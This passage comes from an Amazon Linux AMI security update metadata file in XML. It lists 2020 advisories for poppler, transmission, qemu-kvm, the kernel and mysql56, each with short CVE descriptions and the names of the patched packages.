release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-7.3.19-1.26.amzn1.i686.rpm</filename></package><package name="php73-intl" version="7.3.19" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-intl-7.3.19-1.26.amzn1.i686.rpm</filename></package><package name="php73-fpm" version="7.3.19" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-fpm-7.3.19-1.26.amzn1.i686.rpm</filename></package><package name="php73-dba" version="7.3.19" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-dba-7.3.19-1.26.amzn1.i686.rpm</filename></package><package name="php73-mbstring" version="7.3.19" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-mbstring-7.3.19-1.26.amzn1.i686.rpm</filename></package><package name="php73-xml" version="7.3.19" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-xml-7.3.19-1.26.amzn1.i686.rpm</filename></package><package name="php73-ldap" version="7.3.19" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-ldap-7.3.19-1.26.amzn1.i686.rpm</filename></package><package name="php73-mysqlnd" version="7.3.19" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-mysqlnd-7.3.19-1.26.amzn1.i686.rpm</filename></package><package name="php73-cli" version="7.3.19" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-cli-7.3.19-1.26.amzn1.i686.rpm</filename></package><package name="php73-xmlrpc" version="7.3.19" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-xmlrpc-7.3.19-1.26.amzn1.i686.rpm</filename></package><package name="php73-pspell" version="7.3.19" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pspell-7.3.19-1.26.amzn1.i686.rpm</filename></package><package name="php73-opcache" version="7.3.19" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-opcache-7.3.19-1.26.amzn1.i686.rpm</filename></package><package name="php73-json" version="7.3.19" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-json-7.3.19-1.26.amzn1.i686.rpm</filename></package><package name="php73-snmp" version="7.3.19" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-snmp-7.3.19-1.26.amzn1.i686.rpm</filename></package><package name="php73-imap" version="7.3.19" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-imap-7.3.19-1.26.amzn1.i686.rpm</filename></package><package name="php73-gmp" version="7.3.19" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-gmp-7.3.19-1.26.amzn1.i686.rpm</filename></package><package name="php73-dbg" version="7.3.19" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-dbg-7.3.19-1.26.amzn1.i686.rpm</filename></package><package name="php73-recode" version="7.3.19" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-recode-7.3.19-1.26.amzn1.i686.rpm</filename></package><package name="php73-gd" version="7.3.19" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-gd-7.3.19-1.26.amzn1.i686.rpm</filename></package><package name="php73-pdo-dblib" version="7.3.19" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pdo-dblib-7.3.19-1.26.amzn1.i686.rpm</filename></package><package name="php73-common" version="7.3.19" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-common-7.3.19-1.26.amzn1.i686.rpm</filename></package><package name="php73-tidy" version="7.3.19" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/php73-tidy-7.3.19-1.26.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1398</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1398: medium priority package update for poppler</title><issued date="2020-07-14 02:14:00" /><updated date="2020-07-15 17:28:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-9959:
The JPXStream::init function in Poppler 0.78.0 and earlier doesn't check for negative values of stream length, leading to an Integer Overflow, thereby making it possible to allocate a large memory chunk on the heap, with a size controlled by an attacker, as demonstrated by pdftocairo.
1732340: CVE-2019-9959 poppler: integer overflow in JPXStream::init function leading to memory consumption
CVE-2019-12293:
In Poppler through 0.76.1, there is a heap-based buffer over-read in JPXStream::init in JPEG2000Stream.cc via data with inconsistent heights or widths.
1713582: CVE-2019-12293 poppler: heap-based buffer over-read in JPXStream::init in JPEG2000Stream.cc
CVE-2019-11459:
The tiff_document_render() and tiff_document_get_thumbnail() functions in the TIFF document backend in GNOME Evince through 3.32.0 did not handle errors from TIFFReadRGBAImageOriented(), leading to uninitialized memory use when processing certain TIFF image files.
1716295: CVE-2019-11459 evince: uninitialized memory use in function tiff_document_render() and tiff_document_get_thumbnail()
CVE-2019-10871:
An issue was discovered in Poppler 0.74.0. There is a heap-based buffer over-read in the function PSOutputDev::checkPageSlice at PSOutputDev.cc.
1696636: CVE-2019-10871 poppler: heap-based buffer over-read in function PSOutputDev::checkPageSlice in PSOutputDev.cc
CVE-2018-21009:
Poppler before 0.66.0 has an integer overflow in Parser::makeStream in Parser.cc.
1753850: CVE-2018-21009 poppler: integer overflow in Parser::makeStream in Parser.cc
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-21009" title="" id="CVE-2018-21009" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10871" title="" id="CVE-2019-10871" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11459" title="" id="CVE-2019-11459" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12293" title="" id="CVE-2019-12293" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9959" title="" id="CVE-2019-9959" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="poppler-utils" version="0.26.5" release="42.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-utils-0.26.5-42.20.amzn1.x86_64.rpm</filename></package><package name="poppler-debuginfo" version="0.26.5" release="42.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-debuginfo-0.26.5-42.20.amzn1.x86_64.rpm</filename></package><package name="poppler-glib-devel" version="0.26.5" release="42.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-glib-devel-0.26.5-42.20.amzn1.x86_64.rpm</filename></package><package name="poppler-cpp-devel" version="0.26.5" release="42.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-cpp-devel-0.26.5-42.20.amzn1.x86_64.rpm</filename></package><package name="poppler-glib" version="0.26.5" release="42.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-glib-0.26.5-42.20.amzn1.x86_64.rpm</filename></package><package name="poppler-devel" version="0.26.5" release="42.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-devel-0.26.5-42.20.amzn1.x86_64.rpm</filename></package><package name="poppler" version="0.26.5" release="42.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-0.26.5-42.20.amzn1.x86_64.rpm</filename></package><package name="poppler-cpp" version="0.26.5" release="42.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-cpp-0.26.5-42.20.amzn1.x86_64.rpm</filename></package><package name="poppler-devel" version="0.26.5" release="42.20.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-devel-0.26.5-42.20.amzn1.i686.rpm</filename></package><package name="poppler-debuginfo" version="0.26.5" release="42.20.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-debuginfo-0.26.5-42.20.amzn1.i686.rpm</filename></package><package name="poppler-utils" version="0.26.5" release="42.20.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-utils-0.26.5-42.20.amzn1.i686.rpm</filename></package><package name="poppler-glib" version="0.26.5" release="42.20.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-glib-0.26.5-42.20.amzn1.i686.rpm</filename></package><package name="poppler" version="0.26.5" release="42.20.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-0.26.5-42.20.amzn1.i686.rpm</filename></package><package name="poppler-cpp-devel" version="0.26.5" release="42.20.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-cpp-devel-0.26.5-42.20.amzn1.i686.rpm</filename></package><package name="poppler-glib-devel" version="0.26.5" release="42.20.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-glib-devel-0.26.5-42.20.amzn1.i686.rpm</filename></package><package name="poppler-cpp" version="0.26.5" release="42.20.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-cpp-0.26.5-42.20.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1399</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1399: medium priority package update for transmission</title><issued date="2020-07-14 02:15:00" /><updated date="2020-07-15 17:27:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-10756:
CVE-2018-10756 : Use-after-free in libtransmission/variant.c in Transmission before 3.00 allows remote attackers to cause a denial of service (crash) or possibly execute arbitrary code via a crafted torrent file.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10756" title="" id="CVE-2018-10756" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="transmission" version="3.00" release="1.1.amzn1" epoch="0" arch="x86_64"><filename>Packages/transmission-3.00-1.1.amzn1.x86_64.rpm</filename></package><package name="transmission-debuginfo" version="3.00" release="1.1.amzn1" epoch="0" arch="x86_64"><filename>Packages/transmission-debuginfo-3.00-1.1.amzn1.x86_64.rpm</filename></package><package name="transmission-daemon" version="3.00" release="1.1.amzn1" epoch="0" arch="x86_64"><filename>Packages/transmission-daemon-3.00-1.1.amzn1.x86_64.rpm</filename></package><package name="transmission-cli" version="3.00" release="1.1.amzn1" epoch="0" arch="x86_64"><filename>Packages/transmission-cli-3.00-1.1.amzn1.x86_64.rpm</filename></package><package name="transmission-common" version="3.00" release="1.1.amzn1" epoch="0" arch="x86_64"><filename>Packages/transmission-common-3.00-1.1.amzn1.x86_64.rpm</filename></package><package name="transmission-debuginfo" version="3.00" release="1.1.amzn1" epoch="0" arch="i686"><filename>Packages/transmission-debuginfo-3.00-1.1.amzn1.i686.rpm</filename></package><package name="transmission" version="3.00" release="1.1.amzn1" epoch="0" arch="i686"><filename>Packages/transmission-3.00-1.1.amzn1.i686.rpm</filename></package><package name="transmission-cli" version="3.00" release="1.1.amzn1" epoch="0" arch="i686"><filename>Packages/transmission-cli-3.00-1.1.amzn1.i686.rpm</filename></package><package name="transmission-daemon" version="3.00" release="1.1.amzn1" epoch="0" arch="i686"><filename>Packages/transmission-daemon-3.00-1.1.amzn1.i686.rpm</filename></package><package name="transmission-common" version="3.00" release="1.1.amzn1" epoch="0" arch="i686"><filename>Packages/transmission-common-3.00-1.1.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1400</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1400: important priority package update for qemu-kvm</title><issued date="2020-07-14 20:27:00" /><updated date="2020-07-15 17:27:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-8608:
In libslirp 4.1.0, as used in QEMU 4.2.0, tcp_subr.c misuses snprintf return values, leading to a buffer overflow in later code.
1798453: CVE-2020-8608 QEMU: Slirp: potential OOB access due to unsafe snprintf() usages
CVE-2020-7039:
tcp_emu in tcp_subr.c in libslirp 4.1.0, as used in QEMU 4.2.0, mismanages memory, as demonstrated by IRC DCC commands in EMU_IRC. This can cause a heap-based buffer overflow or other out-of-bounds access which can lead to a DoS or potential execute arbitrary code.
1791551: CVE-2020-7039 QEMU: slirp: OOB buffer access while emulating tcp protocols in tcp_emu()
CVE-2019-9824:
tcp_emu in slirp/tcp_subr.c (aka slirp/src/tcp_subr.c) in QEMU 3.0.0 uses uninitialized data in an snprintf call, leading to Information disclosure.
1678515: CVE-2019-9824 QEMU: slirp: information leakage in tcp_emu() due to uninitialized stack variables
1678515:
CVE-2019-9824 QEMU: Slirp: information leakage in tcp_emu() due to uninitialized stack variables
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9824" title="" id="CVE-2019-9824" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7039" title="" id="CVE-2020-7039" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8608" title="" id="CVE-2020-8608" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="qemu-kvm-debuginfo" version="1.5.3" release="156.19.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-debuginfo-1.5.3-156.19.amzn1.x86_64.rpm</filename></package><package name="qemu-kvm" version="1.5.3" release="156.19.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-1.5.3-156.19.amzn1.x86_64.rpm</filename></package><package name="qemu-kvm-tools" version="1.5.3" release="156.19.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-tools-1.5.3-156.19.amzn1.x86_64.rpm</filename></package><package name="qemu-kvm-common" version="1.5.3" release="156.19.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-common-1.5.3-156.19.amzn1.x86_64.rpm</filename></package><package name="qemu-img" version="1.5.3" release="156.19.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-img-1.5.3-156.19.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1401</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1401: important priority package update for kernel</title><issued date="2020-07-14 21:14:00" /><updated date="2020-07-15 17:26:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-12771:
An issue was discovered in the Linux kernel through 5.6.11. btree_gc_coalesce in drivers/md/bcache/btree.c has a deadlock if a coalescing operation fails.
1834862: CVE-2020-12771 kernel: deadlock if a coalescing operation fails in btree_gc_coalesce function in drivers/md/bcache/btree.c
CVE-2020-10768:
A flaw was found in the prctl() function, where it can be used to enable indirect branch speculation after it has been disabled. This call incorrectly reports it as being 'force disabled' when it is not and opens the system to Spectre v2 attacks. The highest threat from this vulnerability is to confidentiality.
1845868: CVE-2020-10768 kernel: Indirect branch speculation can be enabled after it was force-disabled by the PR_SPEC_FORCE_DISABLE prctl command.
CVE-2020-10767:
A flaw was found in the Linux kernel's implementation of the Enhanced IBPB (Indirect Branch Prediction Barrier). The IBPB mitigation will be disabled when STIBP is not available or when the Enhanced Indirect Branch Restricted Speculation (IBRS) is available. This flaw allows a local attacker to perform a Spectre V2 style attack when this configuration is active. The highest threat from this vulnerability is to confidentiality.
CVE-2020-10766:
A logic bug flaw was found in the Linux kernel's implementation of SSBD. A bug in the logic handling allows an attacker with a local account to disable SSBD protection during a context switch when additional speculative execution mitigations are in place. This issue was introduced when the per task/process conditional STIPB switching was added on top of the existing SSBD switching. The highest threat from this vulnerability is to confidentiality.
CVE-2020-10757:
A flaw was found in the Linux Kernel in versions after 4.5-rc1 in the way mremap handled DAX Huge Pages. This flaw allows a local attacker with access to a DAX enabled storage to escalate their privileges on the system.
1842525: CVE-2020-10757 kernel: kernel: DAX hugepages not considered during mremap
CVE-2020-10732:
A flaw was found in the Linux kernels implementation of Userspace core dumps. This flaw allows an attacker with a local account to crash a trivial program and exfiltrate private kernel data.
A flaw was found in the Linux kernel's implementation of Userspace core dumps. This flaw allows an attacker with a local account to crash a trivial program and exfiltrate private kernel data.
1831399: CVE-2020-10732 kernel: uninitialized kernel data leak in userspace coredumps
CVE-2020-0543:
Incomplete cleanup from specific special register read operations in some Intel(R) Processors may allow an authenticated user to potentially enable information disclosure via local access.
A new domain bypass transient execution attack known as Special Register Buffer Data Sampling (SRBDS) has been found. This flaw allows data values from special internal registers to be leaked by an attacker able to execute code on any core of the CPU. An unprivileged, local attacker can use this flaw to infer values returned by affected instructions known to be commonly used during cryptographic operations that rely on uniqueness, secrecy, or both.
1827165: CVE-2020-0543 hw: Special Register Buffer Data Sampling (SRBDS)
CVE-2019-19462:
relay_open in kernel/relay.c in the Linux kernel through 5.4.1 allows local users to cause a denial of service (such as relay blockage) by triggering a NULL alloc_percpu result.
1781839: CVE-2019-19462 kernel: NULL pointer dereference in relay_open in kernel/relay.c
CVE-2018-20669:
An issue where a provided address with access_ok() is not checked was discovered in i915_gem_execbuffer2_ioctl in drivers/gpu/drm/i915/i915_gem_execbuffer.c in the Linux kernel through 4.19.13. A local attacker can craft a malicious IOCTL function call to overwrite arbitrary kernel memory, resulting in a Denial of Service or privilege escalation.
1669141: CVE-2018-20669 kernel: missing access_ok() checks in i915_gem_execbuffer2_ioctl() results in priviledge escalation
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20669" title="" id="CVE-2018-20669" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19462" title="" id="CVE-2019-19462" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0543" title="" id="CVE-2020-0543" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10732" title="" id="CVE-2020-10732" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10757" title="" id="CVE-2020-10757" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10766" title="" id="CVE-2020-10766" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10767" title="" id="CVE-2020-10767" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10768" title="" id="CVE-2020-10768" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12771" title="" id="CVE-2020-12771" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools-devel" version="4.14.186" release="110.268.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.186-110.268.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.186" release="110.268.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.186-110.268.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.186" release="110.268.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.186-110.268.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.186" release="110.268.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.186-110.268.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.186" release="110.268.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.186-110.268.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.186" release="110.268.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.186-110.268.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.186" release="110.268.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.186-110.268.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.186" release="110.268.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.186-110.268.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.186" release="110.268.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.186-110.268.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.186" release="110.268.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.186-110.268.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.186" release="110.268.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.186-110.268.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.186" release="110.268.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.186-110.268.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.186" release="110.268.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.186-110.268.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.186" release="110.268.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.186-110.268.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.186" release="110.268.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.186-110.268.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.186" release="110.268.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.186-110.268.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.186" release="110.268.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.186-110.268.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.186" release="110.268.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.186-110.268.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.186" release="110.268.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.186-110.268.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.186" release="110.268.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.186-110.268.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1402</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1402: medium priority package update for mysql56</title><issued date="2020-07-27 23:14:00" /><updated date="2020-07-29 21:41:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-2814:
Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 5.6.47 and prior, 5.7.28 and prior and 8.0.18 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1830060: CVE-2020-2814 mysql: InnoDB unspecified vulnerability (CPU Apr 2020)
CVE-2020-2812:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Stored Procedure). Supported versions that are affected are 5.6.47 and prior, 5.7.29 and prior and 8.0.19 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1830059: CVE-2020-2812 mysql: Server: Stored Procedure unspecified vulnerability (CPU Apr 2020)
CVE-2020-2804:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Memcached). Supported versions that are affected are 5.6.47 and prior, 5.7.29 and prior and 8.0.19 and prior. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 5.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H).
1830058: CVE-2020-2804 mysql: Server: Memcached unspecified vulnerability (CPU Apr 2020)
CVE-2020-2780:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DML). Supported versions that are affected are 5.6.47 and prior, 5.7.29 and prior and 8.0.19 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1830056: CVE-2020-2780 mysql: Server: DML unspecified vulnerability (CPU Apr 2020)
CVE-2020-2763:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Replication). Supported versions that are affected are 5.6.47 and prior, 5.7.29 and prior and 8.0.19 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1830051: CVE-2020-2763 mysql: Server: Replication unspecified vulnerability (CPU Apr 2020)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2763" title="" id="CVE-2020-2763" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2780" title="" id="CVE-2020-2780" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2804" title="" id="CVE-2020-2804" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2812" title="" id="CVE-2020-2812" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2814" title="" id="CVE-2020-2814" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql56-embedded-devel" version="5.6.49" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-devel-5.6.49-1.37.amzn1.x86_64.rpm</filename></package><package name="mysql56-libs" version="5.6.49" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-libs-5.6.49-1.37.amzn1.x86_64.rpm</filename></package><package name="mysql56-errmsg" version="5.6.49" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-errmsg-5.6.49-1.37.amzn1.x86_64.rpm</filename></package><package name="mysql56-common" version="5.6.49" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-common-5.6.49-1.37.amzn1.x86_64.rpm</filename></package><package name="mysql56-devel" version="5.6.49" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-devel-5.6.49-1.37.amzn1.x86_64.rpm</filename></package><package name="mysql56-server" version="5.6.49" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-server-5.6.49-1.37.amzn1.x86_64.rpm</filename></package><package name="mysql56-test" version="5.6.49" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-test-5.6.49-1.37.amzn1.x86_64.rpm</filename></package><package name="mysql56" version="5.6.49" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-5.6.49-1.37.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded" version="5.6.49" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-5.6.49-1.37.amzn1.x86_64.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.49" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-debuginfo-5.6.49-1.37.amzn1.x86_64.rpm</filename></package><package name="mysql56-bench" version="5.6.49" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-bench-5.6.49-1.37.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded" version="5.6.49" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-5.6.49-1.37.amzn1.i686.rpm</filename></package><package name="mysql56-libs" version="5.6.49" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-libs-5.6.49-1.37.amzn1.i686.rpm</filename></package><package name="mysql56" version="5.6.49" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-5.6.49-1.37.amzn1.i686.rpm</filename></package><package name="mysql56-bench" version="5.6.49" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-bench-5.6.49-1.37.amzn1.i686.rpm</filename></package><package name="mysql56-common" version="5.6.49" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-common-5.6.49-1.37.amzn1.i686.rpm</filename></package><package name="mysql56-server" version="5.6.49" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-server-5.6.49-1.37.amzn1.i686.rpm</filename></package><package name="mysql56-test" version="5.6.49" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-test-5.6.49-1.37.amzn1.i686.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.49" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-debuginfo-5.6.49-1.37.amzn1.i686.rpm</filename></package><package name="mysql56-errmsg" version="5.6.49" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-errmsg-5.6.49-1.37.amzn1.i686.rpm</filename></package><package name="mysql56-embedded-devel" version="5.6.49" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-devel-5.6.49-1.37.amzn1.i686.rpm</filename></package><package 